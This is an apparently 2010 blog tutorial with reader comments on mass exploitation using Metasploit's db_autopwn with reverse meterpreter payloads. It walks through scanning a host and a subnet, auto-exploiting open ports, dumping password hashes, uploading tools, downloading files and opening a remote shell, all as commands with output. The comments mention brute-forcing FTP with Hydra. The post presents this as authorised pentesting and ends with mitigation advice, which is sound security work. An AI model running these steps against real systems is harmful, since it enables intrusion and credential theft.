Tuesday, 17 August 2010

Mass Pwnage: Hacking with Metasploit db_autopwn and reverse meterpreter payloads

Metasploit is a powerful exploitation framework and can be used to scan and attack multiple systems in an automated way. Here we look at some basic examples of using the Metasploit db_autopwn feature.

These techniques can be used to scan networks by identifying real exploitable vulnerabilites on-mass. Patch-management and proper configuration are usually the cures for most of these vulnerabilities, but having knowledge of where the exploitable vulnerabilites are in a network is the first step to help focus your efforts in the most needy areas.

Also, knowing the power that an attacker can wield with such tools can help raise the priority of IT Security in risk assessment, especially when reporting to managment, so that the correct resources can be applied to reduce risks.

Please be good and do not abuse these techniques to attack systems where you don't have express permission. These techniques can easily cause denial of service, and should only be used for pentesting and educational purposes.

We will be using Backtrack 4 R1 in these examples, as Metasploit and Mysql are already installed and preconfigured.



Setup
We are going to be logging our information to a database, so let's start Mysql first:




/etc/init.d/mysql start
netstat -antp |grep 3306

tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      5852/mysqld

That's Mysql running ok, now let's start Metasploit:
cd /pentest/exploits/framework3/
./msfconsole

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9959 updated 8 days ago (2010.08.05)

Warning: This copy of the Metasploit Framework was last updated 8 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf>

First we will select a database driver, in this case we are using Mysql

db_driver mysql

Basic db_autopwn pwnage
In the first example we will create a new database called mytest1 using our mysql credentials, connect to it, and scan a single machine using nmap. Then we will run all the vulnerabilites that match the open ports that are found:

db_connect root:toor@mytest1
db_nmap 192.168.1.2
db_autopwn -p -t -e -r


The db_autopwn options in this example will match exploits to open ports (-p) show the exploits to be run (-t) run the exploits (-e) and connect back using a reverse meterpreter payload (-e).

This may take several minutes to run, based on the number and types of open ports. HTTP ports can take a long time, due to the large number of available exploits included in Metasploit for the well known HTTP ports. Let the exploitation complete (it may take 10mins+ depending on your connectivity to the victim system)

If any exploits are successful, a list of active sessions to the victim machine will be shown. We have a reverse meterpreter session and we can interact with it as follows:

sessions -l

Active sessions
===============

  Id  Type         Information                    Connection
  --  ----         -----------                    ----------
  1   meterpreter  TEST-DESKTOP\Ben @ TEST-DESKTOP  192.168.1.64:4444 -> 192.168.1.65:1386

sessions -i 1
[*] Starting interaction with 1...

meterpreter >


Once we connect to the session further attacks and analysis can proceed as follows:

1) Obtaining the password hashes:

use priv
Loading extension priv...success.

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ca760e0d17329dc138d1f5b561ec6e7a:af03c8eecf80cd854ea88b0292b926c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:d0ddee59ea760a946232d2192bbe3c71:::


2) Uploading and downloading files:

upload /var/www/plink.exe c:\\
[*] uploading  : /var/www/plink.exe -> c:\
[*] uploaded   : /var/www/plink.exe -> c:\\plink.exe


download c:\\windows\\system32\\drivers\\etc\\hosts /root/hosts
[*] downloading: c:\windows\system32\drivers\etc\hosts -> /root/hosts
[*] downloaded : c:\windows\system32\drivers\etc\hosts -> /root/hosts


3) Gaining a shell:

shell
Process 2640 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>



IP address range exploitation
Attacking multiple machines is where the power of db_autopwn really comes into effect.

Lets scan, and attempt to exploit, a whole subnet in a new database

db_driver mysql
db_connect root:toor@mysubnet1
db_nmap 192.168.1.0/24


Now let's look at the systems we have data on:

db_hosts

Hosts
=====

address        address6  arch  comm  comments  created_at                    info  mac                name            os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at                    svcs  vulns  workspace
-------        --------  ----  ----  --------  ----------                    ----  ---                ----            ---------  -------  -------  -----  -------  -----  ----------                    ----  -----  ---------
192.168.1.254                                  Tue Aug 17 12:51:56 UTC 2010        00:0E:50:EC:B2:A6  speedtouch.lan                                               alive  Tue Aug 17 12:51:56 UTC 2010  5     0      default
192.168.1.65                                   Tue Aug 17 13:22:14 UTC 2010        00:22:3F:E9:89:FF  test_system.lan                                                alive  Tue Aug 17 13:22:14 UTC 2010  4     0      default

Again, an exploitation of the scanned machines could be run as follows:

db_autopwn -p -t -e -r

However, depending on the number of machines found, running this exploitation may take considerable time.

Additionally, in a live pentest, exploiting many systems at once can cause denial of service headaches on multiple systems. This can be mitigated by focusing the exploitation on particular ports, or particular ranges of machines, and working through the network gradually, logging vulnerabilities in our database as we go.

The exploitation can be focused by; IP address range:

db_autopwn -p -t -e -r -I 192.168.1.10

..or by port:

db_autopwn -p -t -e -r -PI 445

.. or both:

db_autopwn -p -t -e -r -PI 445 -I 192.168.1.10

For large numbers of vulnerable machines, this makes the exploitation and analysis more manageable, especially on production networks where live services may be affected and need to be restarted.

What have we found?
We exploited multiple vulnerabilities in several systems, gained access, and "did stuff", but which vulnerabilities did we exploit on these systems?

You can interrogate the list of successful exploitations by running the following command in Metasploit:

db_vulns

Alternatively, we can go and have a poke around in the mysql database directly, with the following sequence of commands:

mysql -u root -ptoor

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.0.67-0ubuntu6 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| mysubnet1          |
+--------------------+
7 rows in set (0.36 sec)

mysql> use mysubnet1;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------------+
| Tables_in_mysubnet1 |
+---------------------+
| clients             |
| events              |
| hosts               |
| loots               |
| notes               |
| refs                |
| reports             |
| schema_migrations   |
| services            |
| tasks               |
| users               |
| vulns               |
| vulns_refs          |
| wmap_requests       |
| wmap_targets        |
| workspaces          |
+---------------------+
16 rows in set (0.00 sec)

mysql> select * from vulns;


We have completed our basic pentest on our subnet, and identified some vulnerable hosts. We know exactly which ones, and what needs to be fixed.

Take a bow for a round of applause, time for a teabreak ...and that was a basic guide on db_autopwn

These threats are best mitigated using an IT Security program which includes:
  • Multiple layers (defense in depth)
  • Secure application development/deployment
  • Applying recommended safe configurations
  • Patch management and software upgrades
  • Vulnerability scanning and remediation

9 comments:

  1. hi, thanks for your post. i am just starting to learn about hacking and i have 1 quick question please:
    - Metasploit db_autopwn is use to penetrate networks (as opposed to live websites)... is that correct? i tried to penetrate several of my own website with the most recent version of backtrack 4r2 and it has never opened a single session so far...
    Rgds.

    ReplyDelete
  2. Don't break the law (check my post from Jan 26, 2011)
    Do some research (Google: "Metasploit Unleashed")

    ReplyDelete
  3. Hi, I know I am not obliged to respond but maybe I used words that made you misunderstood my true intentions. Actually I own 3 websites and hackers defaced 1 of my site. So I was wondering if they could have used this specific function db_autopwn even if my site is hosted on a big 3rd party hosting company like hostmonsters - not on my personal servers. (For example I don't control Apache version update on them!)
    Sorry for the confusion, don’t feel oblige to respond, I just wanted to clear that up.
    (I should have used the term penetration testing instead of hacking I guess.)

    ReplyDelete
  4. Sure, it's not a problem. Sorry my initial response was a bit brief. I wasn't trying to be rude.

    If you look at my post on the "legal implications" back at the end of January, you will see that individuals can't legally "pentest" their own websites if they are hosted with a third-party (unless you have permission, which would be very difficult to get if you are acting as an individual)

    To be honest, db_autopwn would be pretty useless for attacking internet-facing systems, as bot-nets already do that en-masse 24/7.

    Anything internet-facing that is pwnable in an automated way, is typically already pwned by botnets.

    db_autopwn is more useful for internal penetration testing in companies (or for experimentation and fun at home ;o)

    It is an interesting tool for experimentation, and demonstration, but probably too generic and unfocused to be used by real attackers.

    ReplyDelete
  5. Depending on your site, it may have been a web-vulnerability in the code you were using.

    (more likely that an Apache or FTP vulnerability which db_autopwn might find for example)

    Again, Metasploit is not really a tool for web application attack testing. Maybe I will do a blog on various web application attack tools at some point.

    (there are 1000's of different tools for different purposes)

    ReplyDelete
  6. Hi Ben,

    I appreciate your clear response. I didn’t know I couldn’t pentest my own website so thank you for enlightening me on that (feel great to be anonymous!) My goal with db_autopwn was to try to ‘reverse-engineer’ the hack… it couldn’t open any session so I wanted to make sure I was using the proper tool. Maybe the hacker bruteforced our ftp port but it really doesn’t seem efficient to me.

    In the future maybe I can mirror the sites with htttrack and pentest them on my drive… that complicate things and don’t seem appropriate to test server-side security tough… But since the sites are third-party hosted and I have no real control on servers I should maybe just let it go.

    I would like to read your blog on web applications attack tools for sure.

    Rgds.

    (So I’ve installed backtrack and learned a few functions for no reason since I don’t have access to company networks nor want to breach them. Would still be fun to test tough… I might install windows server on my cpu with virtualbox!)

    ReplyDelete
  7. Hydra is one of the best brute-force tools (available in Backtrack 4) Also in that distribution are millions of passwords in several databases.

    This makes brute-forcing FTP passwords trivial (and many other protocols) as long as the password is one that appears in one of the dictionaries.

    This could be the root of your problem, but there could be many reasons. Do you have the website and ftp logs?

    (if it were me, I would start there)

    ReplyDelete
  8. OK... so just to make things clear ... the db_autopwn option can be used just on serves and databases ? Can it be used to check the vulnerabilities on a normal , standalone computer with lets say ... windows xp installed ? it should be possible ... because the exploit database is the same right? thanks a mill !!

    ReplyDelete
  9. Anonymous - Yes, Metasploit can be used anywhere where the vulnerabilities it contains are present. This could include servers, workstations, laptops, smart-phones and appliances.

    ReplyDelete